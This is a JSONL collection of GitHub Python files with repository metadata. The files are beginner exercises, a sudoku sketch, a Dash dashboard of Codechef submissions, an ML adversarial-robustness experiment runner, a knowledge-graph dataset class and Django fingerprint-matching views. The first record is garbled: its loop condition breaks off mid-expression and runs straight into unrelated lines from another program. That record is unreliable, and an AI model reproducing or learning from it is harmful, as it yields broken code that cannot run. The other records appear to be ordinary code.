+{"seq_id":"9489547030","text":"import itertools\nN = input()\nN = int(N)\nAs = list(map(int,input().split(\" \")))\nans = 0\nl = 0\nr = 0\nbefore = 0\nwhile l< N:\n while N > r >= l and before self.your_power:\n print(\"我赢了!\")\n else:\n print(\"你赢了\")\n\n\n\n\n","repo_name":"chenrong1105/chenrong_zuoye","sub_path":"pythoncs/python_zuoye/zuoye2/zuoye2_TongLao.py","file_name":"zuoye2_TongLao.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"38805992789","text":"# Need to create a Human class with attributes: name, surname, age, phone, address\n# Attributes must be filled in the __init__ method\n# You also need to write methods:\n#\n# get_info(self) - which returns a dictionary containing information about the person\n# call(self, phone_number) - which will output \"{self.phone} calling {phone_number}\"\n# You need to create 3 objects of the Human class and call the get_info method on them\n\n\nclass Human:\n\n def __init__(self, name: str, surname: str, age: int, phone: str, address: str):\n self.name = name\n self.surname = surname\n self.age = age\n self.phone = phone\n self.address = address\n\n def get_info(self):\n human_info = {\n 'name': self.name,\n 'surname': self.surname,\n 'age': self.age,\n 'phone': self.phone,\n 'address': self.address,\n }\n return human_info\n\n def call(self, phone_number):\n print(f'{self.phone} calling {phone_number}')\n\n\ninfo1 = Human('Bob', 'Dylan', 45, '+981234567890', 'Fulton St. 654')\ninfo2 = Human('Jim', 'Carrie', 59, '+380234342313', 'Lafayette Av. 12')\ninfo3 = Human('Mishel', 'Pfeiffer', 23, '+86783451242', 'St. Marks Pl. 1')\nprint(info1.get_info())\nprint(info2.get_info())\nprint(info3.get_info())\n\n","repo_name":"spasmx/hillel_aqa_rep","sub_path":"class_human_hw13.py","file_name":"class_human_hw13.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"23590032002","text":"\"\"\"\n经典全组合 直接调用库函数 其实为了点进去看看他的实现代码\n\"\"\"\nimport itertools\n\n\nclass Solution:\n def subsets(self, nums):\n results = []\n for i in range(len(nums) + 1):\n for r in itertools.combinations(nums, i):\n results.append(list(r))\n return results\n\n\ns = Solution()\nprint(s.subsets([1, 2, 3]))\n","repo_name":"algorithm002/algorithm","sub_path":"Week_04/id_3/backtracking/LeetCode_78_3_v2.py","file_name":"LeetCode_78_3_v2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"66"}
+{"seq_id":"27933185025","text":"\n\nimport random\n\n\nboard = [[\" \" for _ in range(9)] for _ in range(9)]\npossible_board = [[[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"] for _ in range(9)] for _ in range(9)]\n\ndef print_board(board):\n for line in board:\n print(line)\n\n#print_board(board)\n\ndef is_legal(to_check: list):\n to_check = [val for val in to_check if val != ' ']\n return len(to_check) == len(set(to_check))\n\ndef is_board_legal(board):\n for i in range(9):\n # Lines\n if not is_legal(board[i]):\n return False\n # Cols\n elif not is_legal([board[j][i] for j in range(9)]):\n return False\n # Cells\n j = i % 3 * 3\n i //= 3\n cell = [\n board[i][j], board[i][j+1], board[i][j+2],\n board[i+1][j], board[i+1][j+1], board[i+1][j+2],\n board[i+2][j], board[i+2][j+1], board[i+2][j+2]\n ]\n if not is_legal(cell):\n return False\n return True\n\ndef cells_with_no_choice(board):\n for line in possible_board:\n for possible in possible_board:\n if len(possible) == 0:\n return True\n return False\n\n\ndef update_cell_possibilities(modified_cell):\n pass\n\n'''\nboard = [\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n \n]\n'''\n\nwhile True:\n best_len = 10\n best = []\n for l, line in enumerate(board):\n for c, cell in enumerate(line):\n if len(possible_board[l][c]) < best_len:\n best_len = len(possible_board[l][c])\n best = [[l, c]]\n elif len(possible_board[l][c]) == best_len:\n best.append([l, c])\n \n chosen = random.choice(best)\n board[chosen[0]][chosen[1]] = random.choice(possible_board[chosen[0]][chosen[1]])\n","repo_name":"Mactywd/puzzles","sub_path":"sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"7554761777","text":"# n! means n × (n − 1) × ... × 3 × 2 × 1\n\n# For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\n# and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\n# Find the sum of the digits in the number 100!\n\nfrom math import factorial\n\nnumber = factorial(100)\ntotal = 0\n\nfor num in str(number):\n total += int(num)\n\nprint(total)\n","repo_name":"alexLaws/projectEuler","sub_path":"020problem.py","file_name":"020problem.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"16965067718","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom config import DATA_DIR\n\n\"\"\"\nQuestions\n\"\"\"\n\n\ndef plot_questions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"SubmissionCount\"], y=df[\"Tags\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Tags\"))\n return fig\n\n\nquestions_df = pd.read_csv(DATA_DIR / \"codechef/questions.csv\", index_col=[0])\n\nquestions_df_with_count = questions_df.dropna(subset=[\"SubmissionCount\"]).copy()\nquestions_df_with_count[\"Tags\"] = questions_df_with_count[\"Tags\"].apply(lambda tags: eval(tags))\ntag_count_top_10 = questions_df_with_count \\\n .explode(\"Tags\") \\\n .groupby(\"Tags\")[\"SubmissionCount\"] \\\n .sum().sort_values(ascending=False)[:10]\nfig1 = plot_questions_tag_chart(pd.DataFrame(tag_count_top_10).reset_index())\n\n\"\"\"\nSolutions\n\"\"\"\n\n\ndef plot_submissions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"UserID\"], y=df[\"Language\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Languages\"))\n return fig\n\n\nsolutions_df = pd.read_csv(DATA_DIR / \"codechef/solutions.csv\", index_col=[1])\nlanguage_count = solutions_df \\\n .reset_index()[[\"UserID\", \"Language\"]] \\\n .drop_duplicates() \\\n .groupby(\"Language\")[\"UserID\"] \\\n .count() \\\n .sort_values(ascending=False)[:10]\nfig2 = plot_submissions_tag_chart(pd.DataFrame(language_count).reset_index())\n\n\ndef plot_language_invalid_state_chart(df):\n status = df[\"Status\"].unique()\n sum_df = df.groupby(\"Language\").agg({\"SolutionID\": \"sum\"})\n sorted_index = sum_df.sort_values(\"SolutionID\", ascending=False).index\n percentage_df = df.groupby([\"Language\", \"Status\"]).agg({\"SolutionID\": \"sum\"}). \\\n div(sum_df, level=\"Language\"). \\\n reset_index(). \\\n set_index(\"Language\").loc[sorted_index]. \\\n reset_index()\n fig = go.Figure([\n go.Bar(\n name=state,\n x=percentage_df[percentage_df[\"Status\"] == state][\"Language\"],\n y=percentage_df[percentage_df[\"Status\"] == state][\"SolutionID\"],\n )\n for state in status])\n fig.update_layout(dict(barmode=\"stack\"))\n fig.update_layout(xaxis=dict(title=\"Types of Unsuccessful Submissions by Languages\"))\n return fig\n\n\nvalid_state = [\"accepted\", \"wrong answer\", \"internal error\", \"running..\", \"compiling..\", \"running judge..\"]\nsolutions_df_valid_state = solutions_df.dropna(subset=[\"Status\"]).reset_index()\ninvalid_state_count = solutions_df_valid_state[~solutions_df_valid_state[\"Status\"].isin(valid_state)] \\\n .groupby([\"Status\", \"Language\"])[\"SolutionID\"] \\\n .count() \\\n .reset_index()\ntop_languages_with_invalid_sum = pd.DataFrame(invalid_state_count\n .groupby(\"Language\")[\"SolutionID\"]\n .sum()\n .sort_values(ascending=False)[:10]).reset_index()\nstate_df = invalid_state_count[invalid_state_count[\"Language\"].isin(top_languages_with_invalid_sum[\"Language\"])]\nfig3 = plot_language_invalid_state_chart(state_df)\n\n\ndef plot_pie_chart(df, level_range):\n charts = []\n for level in level_range:\n fig = go.Figure(\n data=[go.Pie(\n labels=df.loc[level, \"SolutionStatus\"],\n values=df.loc[level, \"SolutionID\"],\n hole=.3,\n textinfo=\"label+percent\",\n marker=dict(colors=[\"red\", \"royalblue\"]))\n ],\n layout=dict(annotations=[\n {\n \"font\": {\n \"size\": 16,\n \"color\": '#5A5A5A'\n },\n \"showarrow\": False,\n \"text\": level,\n \"x\": 0.5,\n \"y\": 0.5\n }\n ])\n )\n fig.update(dict(layout_showlegend=False))\n charts.append(fig)\n return charts\n\n\nlevels = [\"beginner\", \"easy\", \"medium\", \"hard\", \"challenge\"]\nsolutions_df_levels = solutions_df.join(questions_df[\"level\"], on=\"QCode\")\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] == \"accepted\", \"SolutionStatus\"] = \"Passed\"\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] != \"accepted\", \"SolutionStatus\"] = \"Failed\"\nsolutions_df_levels = solutions_df_levels.groupby([\"level\", \"SolutionStatus\"])[\"SolutionID\"].count().reset_index()\nfigures = plot_pie_chart(solutions_df_levels.set_index(\"level\"), levels)\n\ncodechef_visualization = dbc.Container([\n html.H1(\"Codechef Competitive Programming Analytics\"),\n html.Hr(),\n dbc.Col([\n html.H3(\"Overview of Passing/Failing Submissions by Levels\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[:3])),\n justify=\"center\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[3:])),\n justify=\"center\"),\n html.H3(\"Detailed Submission Breakdown\"),\n dbc.Row([\n dcc.Graph(id=\"status-chart\", figure=fig3, style=dict(width=\"100%\")),\n ]),\n dbc.Row([\n dcc.Graph(id=\"tag-chart\", figure=fig1),\n dcc.Graph(id=\"language-chart\", figure=fig2)\n ], justify=\"center\")\n ], align=\"start\"),\n],\n fluid=True\n)\n","repo_name":"terryluzj/cs-information-visualization-assignments-python","sub_path":"routes/codechef/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39672950199","text":"import os, sys, datetime, time\nfrom comet_ml import Experiment\n\nimport argparse\n\nfrom learning.dataloader import get_loader, get_info\nfrom experiments.attacks import load_model, init_comet, abbrev_to_task, TASKONOMY_DATASET\nfrom models.mtask_losses import get_losses_and_tasks\nfrom utils.art.attacks.pytorch_mtask import mtask_forone_advacc\n\n\nparser = argparse.ArgumentParser(description='Run Adversarial attacks experiments')\nparser.add_argument('--arch', type=str, default=\"resnet18\")\nparser.add_argument('--dataset', type=str, default=\"taskonomy\")\nparser.add_argument('--model_root', type=str, default=None)\nparser.add_argument('--data_dir', type=str, default=TASKONOMY_DATASET)\nparser.add_argument('--train_task_set', default=\"ds\")\nparser.add_argument('--aux_task_set', default=\"\")\nparser.add_argument('--test_task_set', default=\"\")\nparser.add_argument('--target_task_set', default=\"\")\nparser.add_argument('--step_size', type=int, default=2)\nparser.add_argument('--epoch', type=str, default=\"150\")\nparser.add_argument('--test_batch_size',type=int, default=32)\nparser.add_argument('--classes',type=int, default=18)\nparser.add_argument('--epsilon',type=int, default=16)\nparser.add_argument('--workers',type=int, default=8)\nparser.add_argument('--pixel_scale',type=int, default=255)\nparser.add_argument('--steps', type=int, default=25)\nparser.add_argument('--debug', action='store_true')\nparser.add_argument('--timestamp', type=str, default=None)\nparser.add_argument('--strategy', type=str, default=\"None\")\nparser.add_argument('--name', type=str, default=\"robust-mtl-RQ2_2\")\nparser.add_argument('--norm', type=str, default=\"Linf\")\nparser.add_argument('--metrics', type=str, default=\"vuln\")\nparser.add_argument('--store_examples', type=int, default=0)\nargs = parser.parse_args()\n\ndefault_model_root = os.path.join(\".\",\"output\",args.dataset,\n \"train_{arch}_{dataset}_2021-01-20_19-18-12_9b01b470_trainset_{train}{aux}_testset_{test}_lambda_0.01_seed_42_lrs_120_140\")\nargs.model_root = default_model_root if args.model_root is None else args.model_root\nargs.timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n\ndef run(args):\n\n args_dict = args.__dict__\n for a in args_dict.keys():\n val = args_dict.get(a)\n if isinstance(val,str):\n setattr(args,a,val.replace(\"\\r\", \"\"))\n\n experiment = init_comet(args,project_name=args.name) if args.name != \"#\" else None\n\n args.train_task_set, args.target_task_set, args.test_task_set, args.aux_task_set = \\\n abbrev_to_task(args.train_task_set), abbrev_to_task(args.target_task_set), abbrev_to_task(args.test_task_set), \\\n abbrev_to_task(args.aux_task_set)\n\n\n model = load_model(args)\n args.task_set = args.test_task_set\n target_task = args.target_task_set\n\n val_loader = get_loader(args, \"val\", out_name=True)\n criteria, tasks = get_losses_and_tasks(args)\n info = get_info(args.dataset)\n\n\n dict_losses2 = mtask_forone_advacc(val_loader, model, criteria, target_task, args, info, test_vis=True,\n norm=args.norm,comet=experiment)\n\n\n\nif __name__ == '__main__':\n\n if len(args.train_task_set) == 0:\n exit()\n\n if len(args.test_task_set) == 0:\n args.test_task_set = args.train_task_set\n\n if len(args.target_task_set) == 0:\n args.target_task_set = args.train_task_set\n\n if args.test_task_set.find(\"+\") >-1:\n args.train_task_set = args.train_task_set.split(\"+\")\n args.test_task_set = args.test_task_set.split(\"+\")\n args.target_task_set = args.target_task_set.split(\"+\")\n\n train_task_set, target_task_set, test_task_set = args.train_task_set, args.target_task_set, args.test_task_set\n print(len(train_task_set),len(target_task_set),len(test_task_set))\n\n last_failed = False\n for i, (train, target, test) in enumerate(zip(train_task_set, target_task_set, test_task_set)):\n print(\"### {i}/{l}: attacking {target} with model trained on {train}\".format(train=train,target=target,i=i,\n l=len(train_task_set)))\n args.train_task_set, args.target_task_set, args.test_task_set = train, target, test\n\n try:\n run(args)\n last_failed = False\n except Exception as e:\n if last_failed:\n print(i,\":\",e)\n raise e\n else:\n last_failed = True\n print(i,\":\",e)\n\n\n else:\n run(args)\n\n\n","repo_name":"yamizi/taskaugment","sub_path":"MTVulnerability/experiments/attacks/adv_attack.py","file_name":"adv_attack.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"}
+{"seq_id":"1514595491","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 8:49 下午\n# @Author : HuangSir\n# @FileName: api.py\n# @Software: PyCharm\n# @Desc:\n\nfrom .routers import risk_router_init\nfrom fastapi import FastAPI\n\n\ndef create_app():\n app = FastAPI(title='风险评分模型',\n description=\"\"\"标准评分卡,集成树模型同时调,入参类别变量务必根据枚举值输入,否则报错. \\n\n 标准评分卡模型参数规范详情: lrData\\n\n 集成树模型参数规范详情: lgbData\n \"\"\",\n version='3.0')\n risk_router_init(app)\n return app\n","repo_name":"OverseasWork/ml_api_template","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"10905304727","text":"import copy\nfrom collections import defaultdict\nimport numpy\nfrom dataset import Dataset\n\nclass KelpieDataset(Dataset):\n \"\"\"\n Since Datasets handle the correspondence between textual entities and ids,\n the KelpieDataset has the responsibility to decide the id of the kelpie entity (aka mimic in our paper)\n and to store the train, valid and test samples specific for the original entity and for the kelpie entity\n\n A KelpieDataset is never *loaded* from file: it is always generated from a pre-existing, already loaded Dataset.\n\n Nomenclature used in the KelpieDataset:\n - \"original entity\": the entity to explain the prediction of in the original Dataset;\n - \"clone entity\": a homologous mimic, i.e., a \"fake\" entity\n post-trained with the same training samples as the original entity\n - \"kelpie entity\": a non-homologous mimic, i.e., a \"fake\" entity\n post-trained with slightly different training samples from the original entity.\n (e.g. some training samples may have been removed, or added).\n \"\"\"\n\n def __init__(self,\n dataset: Dataset,\n entity_id: int):\n\n super(KelpieDataset, self).__init__(name=dataset.name,\n separator=dataset.separator,\n load=False)\n\n if dataset.num_entities == -1:\n raise Exception(\"The Dataset passed to initialize a KelpieDataset must be already loaded\")\n\n # the KelpieDataset is now basically empty (because load=False was used in the super constructor)\n # so we must manually copy (and sometimes update) all the important attributes from the original loaded Dataset\n self.num_entities = dataset.num_entities + 1 # adding the Kelpie entity to the count\n self.num_relations = dataset.num_relations\n self.num_direct_relations = dataset.num_direct_relations\n\n # copy relevant data structures\n self.to_filter = copy.deepcopy(dataset.to_filter)\n self.train_to_filter = copy.deepcopy(dataset.train_to_filter)\n self.entity_name_2_id = copy.deepcopy(dataset.entity_name_2_id)\n self.entity_id_2_name = copy.deepcopy(dataset.entity_id_2_name)\n self.relation_name_2_id = copy.deepcopy(dataset.relation_name_2_id)\n self.relation_id_2_name = copy.deepcopy(dataset.relation_id_2_name)\n\n # add the kelpie entity\n self.original_entity_id = entity_id\n self.original_entity_name = self.entity_id_2_name[self.original_entity_id]\n self.kelpie_entity_id = dataset.num_entities # add the kelpie entity to the dataset; it is always the last one\n self.kelpie_entity_name = \"kelpie_\" + self.original_entity_name\n self.entity_name_2_id[self.kelpie_entity_name] = self.kelpie_entity_id\n self.entity_id_2_name[self.kelpie_entity_id] = self.kelpie_entity_name\n\n # We do not copy all the triples and samples from the original dataset: the KelpieDataset DOES NOT NEED THEM.\n # The train, valid, and test samples of the KelpieDataset are generated using only those that featured the original entity!\n self.original_train_samples = self._extract_samples_with_entity(dataset.train_samples, self.original_entity_id)\n self.original_valid_samples = self._extract_samples_with_entity(dataset.valid_samples, self.original_entity_id)\n self.original_test_samples = self._extract_samples_with_entity(dataset.test_samples, self.original_entity_id)\n\n self.kelpie_train_samples = Dataset.replace_entity_in_samples(self.original_train_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_valid_samples = Dataset.replace_entity_in_samples(self.original_valid_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_test_samples = Dataset.replace_entity_in_samples(self.original_test_samples, self.original_entity_id, self.kelpie_entity_id)\n\n # update to_filter and train_to_filter data structures\n samples_to_stack = [self.kelpie_train_samples]\n if len(self.kelpie_valid_samples) > 0:\n samples_to_stack.append(self.kelpie_valid_samples)\n if len(self.kelpie_test_samples) > 0:\n samples_to_stack.append(self.kelpie_test_samples)\n all_kelpie_samples = numpy.vstack(samples_to_stack)\n for i in range(all_kelpie_samples.shape[0]):\n (head_id, relation_id, tail_id) = all_kelpie_samples[i]\n self.to_filter[(head_id, relation_id)].append(tail_id)\n self.to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n # if the sample was a training sample, also do the same for the train_to_filter data structure;\n # Also fill the entity_2_degree and relation_2_degree dicts.\n if i < len(self.kelpie_train_samples):\n self.train_to_filter[(head_id, relation_id)].append(tail_id)\n self.train_to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n\n # create a map that associates each kelpie train_sample to its index in self.kelpie_train_samples\n # this will be necessary to allow efficient removals and undoing removals\n self.kelpie_train_sample_2_index = {}\n for i in range(len(self.kelpie_train_samples)):\n cur_head, cur_rel, cur_tail = self.kelpie_train_samples[i]\n self.kelpie_train_sample_2_index[(cur_head, cur_rel, cur_tail)] = i\n\n\n # initialize data structures needed in the case of additions and/or removals;\n # these structures are required to undo additions and/or removals\n self.kelpie_train_samples_copy = copy.deepcopy(self.kelpie_train_samples)\n\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n # override\n def add_training_samples(self, samples_to_add: numpy.array):\n \"\"\"\n Add a set of training samples to the training samples of the kelpie entity of this KelpieDataset.\n The samples to add must still feature the original entity id; this method will convert them before addition.\n The KelpieDataset will keep track of the last performed addition so it can be undone if necessary\n calling the undo_last_training_samples_addition method.\n\n :param samples_to_add: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_add:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_added_samples = samples_to_add\n self.last_added_samples_number = len(samples_to_add)\n\n # reset all data structures needed to undo additions. We only want to keep track of the *last* addition.\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n kelpie_samples_to_add = Dataset.replace_entity_in_samples(samples_to_add,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n for (cur_head, cur_rel, cur_tail) in kelpie_samples_to_add:\n self.to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.last_added_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_additions[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_additions[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.kelpie_train_samples = numpy.vstack((self.kelpie_train_samples, numpy.array(kelpie_samples_to_add)))\n\n\n def undo_last_training_samples_addition(self):\n \"\"\"\n This method undoes the last addition performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the additions performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n\n if self.last_added_samples_number <= 0:\n raise Exception(\"No addition to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_additions:\n for x in self.last_filter_additions[key]:\n self.to_filter[key].remove(x)\n self.train_to_filter[key].remove(x)\n\n # reset the data structures used to undo additions\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n\n # override\n def remove_training_samples(self, samples_to_remove: numpy.array):\n \"\"\"\n Remove some training samples from the kelpie training samples of this KelpieDataset.\n The samples to remove must still feature the original entity id; this method will convert them before removal.\n The KelpieDataset will keep track of the last performed removal so it can be undone if necessary.\n\n :param samples_to_remove: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_remove:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_removed_samples = samples_to_remove\n self.last_removed_samples_number = len(samples_to_remove)\n\n # reset data structures needed to undo removals. We only want to keep track of the *last* removal.\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n kelpie_train_samples_to_remove = Dataset.replace_entity_in_samples(samples=samples_to_remove,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id,\n as_numpy=False)\n\n # update to_filter and train_to_filter\n for (cur_head, cur_rel, cur_tail) in kelpie_train_samples_to_remove:\n self.to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n\n # and also update the data structures required for undoing the removal\n self.last_removed_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_removals[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_removals[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n # get the indices of the samples to remove in the kelpie_train_samples structure\n # and use them to perform the actual removal\n kelpie_train_indices_to_remove = [self.kelpie_train_sample_2_index[x] for x in kelpie_train_samples_to_remove]\n self.kelpie_train_samples = numpy.delete(self.kelpie_train_samples, kelpie_train_indices_to_remove, axis=0)\n\n\n def undo_last_training_samples_removal(self):\n \"\"\"\n This method undoes the last removal performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the removals performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n if self.last_removed_samples_number <= 0:\n raise Exception(\"No removal to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_removals:\n for x in self.last_filter_removals[key]:\n self.to_filter[key].append(x)\n self.train_to_filter[key].append(x)\n\n # reset the data structures used to undo additions\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n def as_kelpie_sample(self, original_sample):\n if not self.original_entity_id in original_sample:\n raise Exception(\"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(original_sample))\n return Dataset.replace_entity_in_sample(sample=original_sample,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n\n def as_original_sample(self, kelpie_sample):\n if not self.kelpie_entity_id in kelpie_sample:\n raise Exception(\n \"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(kelpie_sample))\n return Dataset.replace_entity_in_sample(sample=kelpie_sample,\n old_entity=self.kelpie_entity_id,\n new_entity=self.original_entity_id)\n\n\n ### private utility methods\n @staticmethod\n def _extract_samples_with_entity(samples, entity_id):\n return samples[numpy.where(numpy.logical_or(samples[:, 0] == entity_id, samples[:, 2] == entity_id))]","repo_name":"AndRossi/Kelpie","sub_path":"kelpie_dataset.py","file_name":"kelpie_dataset.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"66"}
+{"seq_id":"22908961665","text":"from django.db.models import Q\nfrom drf_spectacular.utils import extend_schema_view, extend_schema\nfrom rest_framework import status\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.generics import DestroyAPIView, GenericAPIView, \\\n get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom fingerprints.models.enrollment import Finger\nfrom fingerprints.serializers.api.identification import FingerDetailSerializer, \\\n FingerIdentifySerializer, FingerVerifySerializer\nfrom fingerprints.tools.board_sync import BoardSyncService\n\nfrom fingerprints.tools.matcher.identification import FingerMatcher\nfrom persons.models import Person\n\n\n@extend_schema_view(\n post=extend_schema(summary='Identify', tags=['Fingerprints: Identification']),\n)\nclass FingerIdentifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerIdentifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n templates = Finger.get_template_values(status_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not identified.'\n )\n if response == 0:\n qs = Finger.objects.filter(\n iso_fmr_data=templates[template_index.value],\n )\n instance = qs.first()\n serializer = FingerDetailSerializer(instance).data\n return Response(serializer, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n@extend_schema_view(\n post=extend_schema(summary='Verify', tags=['Fingerprints: Identification']),\n)\nclass FingerVerifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerVerifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n board_id_data = request.data.get('board_id')\n templates = Finger.get_template_values(status_data, board_id_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not verified.'\n )\n if response == 0:\n return Response({'detail': 'Verified'}, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n#\n@extend_schema_view(\n delete=extend_schema(summary='Destroy', tags=['Fingerprints: Identification']),\n)\nclass PersonDestroyView(DestroyAPIView):\n permission_classes = [AllowAny]\n queryset = Person.objects.all()\n serializer_class = None\n\n def get_object(self):\n instance = get_object_or_404(\n Person,\n Q(\n status=self.request.data.get('status'),\n board_id=self.request.data.get('board_id'),\n )\n )\n return instance\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n BoardSyncService().destroy_in_board(instance)\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"mr-Marshanskiy/suprema_fingerprint_matcher","sub_path":"fingerprints/views/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
